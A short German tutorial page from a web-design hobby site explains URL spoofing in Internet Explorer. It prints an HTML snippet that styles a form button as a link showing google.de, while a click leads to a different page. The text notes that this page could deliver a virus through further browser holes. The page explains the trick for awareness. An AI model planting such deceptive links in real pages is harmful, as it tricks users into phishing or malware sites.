Thor's Page - Webdesign und mehr
Allgemeines
» Hauptseite
» News & Updates
» Sitemap
» Impressum
Webdesign
» HTML Crashkurs
» CSS Einführung
» Design Theorie
» 10 Gebote
» Zubehör
Tutorials
» HTML/CSS
» PHP/SSI
» .htaccess
» PC Sicherheit
Interaktiv
» Gästebuch
» Forum
Sonstiges
» Häufige Fragen
» Linkliste
» Computerwitze
» Kontakt

URL Spoofing

Der Trick beim URL Spoofing ist es, dem Anwender einen normalen Link vorzuspielen. Bei diesem Link handelt es sich allerdings um ein Formular, dass mit einem Link umbettet ist. Beim Betrachten der Statusleiste sieht man nun den Link zu http://www.google.de, bei einem Klick darauf landet man allerdings auf http://www.thors-page.de/sicherheit/fake.html.

Das liegt daran, dass der Internet Explorer hier den Link ignoriert und das Formular ausführt.

Mit dieser zweiten Seite können nun weiter Sicherheitslücken des Internet Explorers ausgenutzt werden um einen Virus auf die Festplatte des Anwenders zu spielen.

Beispiel:

Der Code für ein solches Formular könnte folgendermaßen aussehen:

<a href="http://www.google.de" target="_blank">
<form action="http://www.thors-page.de/sicherheit/fake.html" method="get">
<input type="button" value="http://www.google.de" style="border:0px; background:white; color:blue; text-decoration: underline; cursor:pointer;"></input>
</form>
</a>

Zurück